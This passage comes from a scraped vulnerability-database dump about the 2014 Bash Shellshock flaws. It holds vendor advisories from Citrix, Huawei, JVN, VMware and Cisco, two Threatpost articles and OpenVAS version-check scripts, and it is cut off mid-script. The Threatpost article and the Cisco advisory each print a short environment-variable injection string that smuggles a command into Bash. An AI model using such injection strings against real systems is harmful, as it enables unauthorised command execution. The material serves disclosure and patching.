5.4.x: A new version of VIAB, 5.4.5, has been released to address this issue. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/vdi-in-a-box/product-software/vdi-in-a-box-54.html\">https://www.citrix.com/downloads/vdi-in-a-box/product-software/vdi-in-a-box-54.html</a></p>\n<p>Citrix VDI-In-A-Box 5.3.x: A new version of VIAB, 5.3.10, has been released to address this vulnerability. This can be found at the following address: <a href=\"https://www.citrix.com/downloads/vdi-in-a-box/product-software/vdi-in-a-box-53.html\">https://www.citrix.com/downloads/vdi-in-a-box/product-software/vdi-in-a-box-53.html</a></p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<th colspan=\"1\" rowspan=\"1\" width=\"150\">Date</th>\n<th colspan=\"1\" rowspan=\"1\">Change</th>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\" width=\"150\">September 26th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Initial bulletin publishing</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">September 29th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of ByteMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">September 30th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of CloudBridge and SaaS Solutions sections and additional CVE numbers</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 1st 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of CloudPlatform, XenClient Enterprise, Desktop Player for Mac and Synchronizer sections. </td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 2nd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of Licensing section and update of CloudBridge section.</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 3rd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenApp & XenDesktop section.</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 3rd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler ADC and Gateway section.</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 7th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Citrix XenApp & XenDesktop section (Web Interface and CSG on Windows).</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 8th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Citrix XenServer section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 20th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of Merchandising Server section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 23rd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler ADC & Gateway section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 24th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to CloudPlatform and NetScaler sections</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 28th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Licensing section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 29th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenClient Enterprise section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">October 29th 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of CloudPortal Business Manager section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">December 2nd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Merchandising Server and CloudPlatform sections</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">December 3rd 2014</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenClient Enterprise section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 2nd 2015</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 25th 2015</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of VDI-In-A-Box section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">March 2nd 2015</td>\n<td colspan=\"1\" rowspan=\"1\">Addition of NetScaler SDX section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">April 28th 2015</td>\n<td colspan=\"1\" rowspan=\"1\">Update to VDI-In-A-Box section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 8th 2015</td>\n<td colspan=\"1\" rowspan=\"1\">Update to CloudBridge section</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2015-05-11T04:00:00", "published": "2014-09-26T04:00:00", "id": "CTX200217", "href": "https://support.citrix.com/article/CTX200217", "title": "Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities", "type": "citrix", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:24", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2015-03-10T00:00:00", "published": "2014-10-24T00:00:00", "id": "HUAWEI-SA-20141024-01-BASH", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-377648", "title": "Security Advisory-Bash Code Injection Vulnerability", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "jvn": [{"lastseen": "2019-05-29T19:49:21", "bulletinFamily": "info", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "\n ## Description\n\nQNAP QTS is an operating system for Turbo NAS. QNAP QTS contains a flaw in the GNU Bash shell, which may result in an OS command injection vulnerability ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)).\n\n ## Impact\n\nA malicious attacker may be able to execute arbitrary command at the privilege level of the calling application.\n\n ## Solution\n\n**Update the Firmware** \nUpdate to the latest version of firmware according to the information provided by the developer.\n\n ## Products Affected\n\n * QNAP QTS 4.1.1 Build 0927 and earlier\n", "edition": 4, "modified": "2014-10-30T00:00:00", "published": "2014-10-28T00:00:00", "id": "JVN:55667175", "href": "http://jvn.jp/en/jp/JVN55667175/index.html", "title": "JVN#55667175: QNAP QTS vulnerable to OS command injection", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "a. Bash update for multiple products. \n\n\nBash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187, CVE-2014-6277, CVE-2014-6278 to these issues. \n \nVMware products have been grouped into the following four product categories: \n \n**I) ESXi and ESX Hypervisor** \nESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell. ESX has an affected version of the Bash shell. \nSee table 1 for remediation for ESX. \n \n**II) Windows-based products** \nWindows-based products, including all versions of vCenter Server running on Windows, are not affected. \n \n**III) VMware (virtual) appliances** \nVMware (virtual) appliances ship with an affected version of Bash. \nSee table 2 for remediation for appliances. \n \n**IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances)** \nProducts that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch. \n \nMITIGATIONS \n \nVMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances. \n \nRECOMMENDATIONS \n \nVMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. \n \nFor several products, both a patch and a product update are available. In general, if a patch is made available, the patch must be applied to the latest version of the appliance. \n \nCustomers should refer to the specific product Knowledge Base articles listed in Section 4 to understand the type of remediation available and applicable appliance version numbers. \n \nColumn 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available. \n \nTable 1 - ESXi and ESX Hypervisor\n", "edition": 5, "modified": "2014-10-17T00:00:00", "published": "2014-09-30T00:00:00", "id": "VMSA-2014-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0010.html", "title": "VMware product updates address critical Bash security vulnerabilities", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:03", "bulletinFamily": "info", "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "The [Bash bug](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) has kept Linux and UNIX administrators busy deploying a half-dozen patches, worrying about numerous Shellshock exploits in the wild, and a laboring over a general uncertainty that the next supposed fix will break even more stuff.\n\nResearcher Michal Zalewski, a longtime bug-hunter, has been front and center on some of the Bash research and last week said he had found [two additional bugs in the Bourne Again Shell](<http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html>), details of which he\u2019d kept to himself until yesterday.\n\nZalewski took the wraps off the vulnerabilities, one of which, CVE-2014-6278, mimics the original vulnerability reported Sept. 24 but affects only systems patched against the original Bash vulnerability, CVE-2014-6271.\n\n\u201cSystems that relied solely on the original fix will be vulnerable to attacks and need to be updated again,\u201d Zalewski said, adding however, that systems running a patch released by Red Hat engineer Florian Weimer should be immune.\n\nLike the original vulnerability, CVE-2014-6278 allows an attacker to remotely drop executable code by exploiting a weaknesses in environment variables in Bash, which is the most common command line shell used by Linux, UNIX and Mac OS X servers.\n\n\u201cThe internal parser invoked by bash to process the specially encoded function definitions passed around in environmental variables had a small problem: it continued parsing the code past the end of the function definition itself \u2013 and at that point, flat out executed whatever instructions it came across, just as it would do in a normal bash script,\u201d Zalewski explained on his lcamtuf blog. \u201cGiven that the value of certain environmental variables can be controlled by remote attackers in quite a few common settings, this opened up a good chunk of the Internet to attacks.\u201d\n\nA simple test, Zalewski said, would be to run the following code from a Bash shell:\n\n> _x='() { echo vulnerable; }\u2019 bash -c \u2018_x 2>/dev/null || echo not vulnerable\u2019\n\nZalewski\u2019s second bug, CVE-2014-6277, is less interesting than his other vulnerability, he said.\n\n\u201cCVE-2014-6277 is an exploitable memory corruption bug that alters the internal state of the program and can be turned into an exploit that permits remote code execution,\u201d Zalewski said. \u201cIt is perhaps less \u2018interesting\u2019 than the other find, CVE-2014-6278, because it requires a degree of finesse to leverage in an attack \u2013 certainly more than [CVE-2014-6278] or the original bug.\u201d\n\nThe original Bash vulnerability has now been public for more than a week, though some were given a two-week head start under embargo. While Linux distributions pushed patches out the door fairly quickly, there were immediate suspicions\u2014which were confirmed\u2014that the patches were incomplete. Fellow Google researcher Tavis Ormandy uncovered the first problem in the original patch that could be exploited in limited circumstances, Zalewski said. Immediately a new CVE was issued, CVE-2014-7169, and new patches developed. Weimer and Todd Sabin of Red Hat then uncovered a buffer overflow vulnerability that would be difficult to exploit, again resulting in a new identifier, CVE-2014-7186. Another bug, CVE-2014-7187, was then uncovered by Weimer and Sabin, again difficult to exploit, Zalewski said.\n\n[Patches from Bash maintainer Chet Ramey](<http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026>) and [Weimer](<https://access.redhat.com/articles/1200223>) were released that stemmed the tide against a number of publicly disclosed exploits that were in circulation. All of this happened within 48 hours of the first Bash disclosure and in advance of an anticipated [patch from Apple for three versions of OS X](<http://threatpost.com/apple-patches-shellshock-vulnerability-in-bash-for-os-x/108611>), all of which were possibly incomplete as well.\n\n\u201cAt that point, Florian\u2019s patch seemed just like a good idea (and had been adopted by some Linux distributions as a defense-in-depth), but we had no conclusive evidence that people who have used just the original fix (or the followup fixes for CVE-2014-7169) are vulnerable to any specific, comparably serious bugs,\u201d Zalewski said.\n\nShellshock, like Heartbleed before it, has Internet-wide consequences and poses a number of patching challenges because so many hidden functions rely on Bash. A number of security companies have reported exploit code in the wild, some of it [harvesting bots for DDoS attacks](<http://threatpost.com/honeypot-snares-two-bots-exploiting-bash-vulnerability/108578>), while others are merely trying to comprehensively enumerate the number of vulnerable systems without much luck.\n\n\u201cAll remote code execution vulnerabilities essentially permit the attacker to take control of the affected systems. Less ambitious attackers may leverage them just to take control of a large number of systems to use in a DDoS attack and settle for that, but there is nothing about the underlying bash bugs that makes them uniquely suited for the job,\u201d Zalewski said. \u201cThe defining characteristics of the original bash bug are that it affected a very significant number of systems and that it could be exploited with remarkably serious consequences in an unusually simple way. It is also somewhat unusual in that it cropped up in an unexpected place.\u201d\n\nThe Bash vulnerability\u2019s ubiquity has also upped the ante and will likely inspire further scrutiny of other core infrastructure.\n\n\u201cThe tricky part about this bug is that nobody was expecting that bash may be doing complex parsing of environmental variables, so we didn\u2019t even have this attack surface mapped out,\u201d Zalewski said. \u201cIn contrast to this, everybody is worried about the next big bug in OpenSSH, Apache, OpenSSL, etc.\u201d\n", "modified": "2014-10-07T14:36:55", "published": "2014-10-03T05:00:50", "id": "THREATPOST:DBB88263397DE4DA6604A2D6517DC194", "href": "https://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674/", "type": "threatpost", "title": "Researcher Takes Wraps off Undisclosed Bash Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors\u2019 hands in a similar fashion.\n\nVirtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.\n\nFor the most part the company still has its hands full.\n\nAccording to [yesterday\u2019s security advisory](<http://www.vmware.com/security/advisories/VMSA-2014-0010.html>), it\u2019s currently in the middle of developing a patch for all but one of 38 different virtual appliance products, all of which run on Linux and are shipped with an affected version of Bash.\n\nThat leaves vCenter Log Insight 2.0, a cloud-based analytics platform, as the lone Bash-affected product the company has patched so far. [The company posted](<https://my.vmware.com/web/vmware/details?downloadGroup=STRATA20&productId=412&rPId=5804?src=vmw_so_vex_escho_597>) a download link for the patch file, a .PAK called \u201cUpdate 1,\u201d yesterday.\n\nVMware is also prepping a patch for ESX Hypervisor, one of the company\u2019s many pieces of software that runs virtual machines that has an affected version of the Bash shell. Patches for both 4.0 and 4.1 are forthcoming. The company did not provide a timeframe for the fix but did claim the patch release would be an exception to its existing VMware lifecycle policy.\n\nA variant of ESX, ESXi \u2014 which uses a different kind of shell, Ash, is not vulnerable and neither are any of the company\u2019s Windows-based products.\n\nThe company issued a all-encompassing warning about Bash at the end of its advisory, stressing that any unnamed products that may use the Bash shell as part of its operating system could also be vulnerable.\n\nTo mitigate vulnerabilities its encouraging users to \u201crestrict access to appliances through firewall rules and other network layer controls to only trusted IP addresses\u201d and deploy patches as they become available.\n\nOnce pushed the patches should address the handful of attack vectors \u2013 CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187 \u2013 that attackers have been using to exploit Shellshock.\n\nShellshock, a critical remote code execution vulnerability in Bash, first surfaced [a week ago](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) and over the last several days developers have come to grips with how pervasive it may or may not be throughout their systems.\n\n[Apple was quick](<http://threatpost.com/apple-os-x-safe-by-default-against-bash-vulnerability/108586>) to caution users last week that users\u2019 OSX systems were safe by default while [OpenVPN warned yesterday](<http://threatpost.com/openvpn-vulnerable-to-shellshock-bash-vulnerability/108616>) its servers are vulnerable to the threat.\n", "modified": "2014-10-01T18:43:47", "published": "2014-10-01T14:43:47", "id": "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848", "href": "https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/", "type": "threatpost", "title": "VMware Begins to Patch Bash Issues Across Product Line", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2020-12-24T11:41:39", "bulletinFamily": "software", "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.\n All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, authentication is required before exploitation could be attempted.\n\nA number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is a third-party software component that is part of the GNU software project and used by a number of software vendors. As of this version of the Security Advisory, there have been a number of vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. For vulnerable products, Cisco has included information on the product versions that will contain the fixed software, and the date these versions are expected to be published on the cisco.com download page [\"http://www.cisco.com/cisco/web/support/index.html#~shp_download\"]. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability. This advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\"]\n\nThe bash shell allows shell variables and functions to be exported to a child from its parent through the process environment. Function definitions are passed using environment variables that share the name of the function and start with () {. \n\nThe child bash process does not stop processing and executing code after processing the closing brace } which is passed in the function definition. An attacker could define a function variable such as: FUNCT=() { ignored; }; /bin/id to execute /bin/id when the environment is imported into the child process. \n\nThe impact of this vulnerability on Cisco products may vary depending on the affected product because some attack vectors such as SSH, require successful authentication to be exploited and may not result in any additional privileges granted to the user.", "modified": "2015-04-01T21:14:56", "published": "2014-09-26T01:00:00", "id": "CISCO-SA-20140926-BASH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash", "type": "cisco", "title": "GNU Bash Environment Variable Command Injection Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-07T18:47:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "A number of security vulnerabilities have been identified in the\n `bash", "modified": "2020-04-02T00:00:00", "published": "2014-12-18T00:00:00", "id": "OPENVAS:1361412562310105146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105146", "type": "openvas", "title": "Citrix XenServer Shellshock Security Update (CTX200223)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Citrix XenServer Shellshock Security Update (CTX200223)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:citrix:xenserver\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105146\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-02T13:53:24+0000\");\n\n script_name(\"Citrix XenServer Shellshock Security Update (CTX200223)\");\n\n script_xref(name:\"URL\", value:\"http://support.citrix.com/article/CTX200223\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed hotfixes.\");\n\n script_tag(name:\"solution\", value:\"Apply the hotfix referenced in the advisory.\");\n\n script_tag(name:\"summary\", value:\"A number of security vulnerabilities have been identified in the\n `bash' component of Citrix XenServer. These issues include those known as `Shellshock'\");\n\n script_tag(name:\"affected\", value:\"These issues affect all supported versions of Citrix XenServer up\n to and including Citrix XenServer 6.2 Service Pack 1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-02 13:53:24 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-18 17:37:46 +0100 (Thu, 18 Dec 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Citrix Xenserver Local Security Checks\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_xenserver_version.nasl\");\n script_mandatory_keys(\"xenserver/product_version\", \"xenserver/patches\");\n\n exit(0);\n}\n\ninclude(\"citrix_version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\nif( ! hotfixes = get_kb_item(\"xenserver/patches\") )\n exit( 0 );\n\npatches = make_array();\n\npatches['6.2.0'] = make_list( 'XS62ESP1014' );\npatches['6.1.0'] = make_list( 'XS61E044' );\npatches['6.0.2'] = make_list( 'XS602E037', 'XS602ECC013' );\npatches['6.0.0'] = make_list( 'XS60E041' );\n\ncitrix_xenserver_check_report_is_vulnerable( version:version, hotfixes:hotfixes, patches:patches );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "A number of security vulnerabilities have been identified in the\n`bash", "modified": "2018-10-12T00:00:00", "published": "2015-01-07T00:00:00", "id": "OPENVAS:1361412562310105156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105156", "type": "openvas", "title": "McAfee Email Gateway - Bash Shellshock Code Injection Exploit", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mcafee_email_gateway_sb10085.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# McAfee Email Gateway - Bash Shellshock Code Injection Exploit\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mcafee:email_gateway\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105156\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"McAfee Email Gateway - Bash Shellshock Code Injection Exploit\");\n\n script_xref(name:\"URL\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed version and hotfixes\");\n script_tag(name:\"solution\", value:\"Apply the hotfix referenced in the advisory.\");\n\n script_tag(name:\"summary\", value:\"A number of security vulnerabilities have been identified in the\n`bash' component of several McAfee products. These issues include those known as `Shellshock'\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-07 17:42:14 +0100 (Wed, 07 Jan 2015)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_mcafee_email_gateway_version.nasl\");\n script_mandatory_keys(\"mcafee_email_gateway/product_version\", \"mcafee_email_gateway/patches\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\nproduct = get_kb_item(\"mcafee_email_gateway/product_name\");\nif( ! product ) product = 'McAfee Email Gateway';\n\nif( ! patches = get_kb_item(\"mcafee_email_gateway/patches\") ) exit( 0 );\n\nif( version =~ \"^7\\.0\\.\" )\n{\n fixed = '7.0.2934.111';\n patch = '7.0.5h1010264';\n}\n\nelse if (version =~ \"^7\\.5\\.\")\n{\n fixed = \"7.5.3088.112\";\n patch = \"7.5.4h1010253\";\n}\n\nelse if (version =~ \"^7\\.6\\.\")\n{\n fixed = \"7.6.3044.119\";\n patch = \"7.6.2h1010246\";\n}\n\nelse\n exit( 0 );\n\nif( patch >< patches ) exit( 99 );\n\nif( version_is_less( version:version, test_version:fixed ) )\n{\n report = product + ' (' + version + ') is missing the patch ' + patch + '.\\n';\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-7186"], "description": "Gentoo Linux Local Security Checks GLSA 201410-01", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121274", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121274", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201410-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201410-01.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 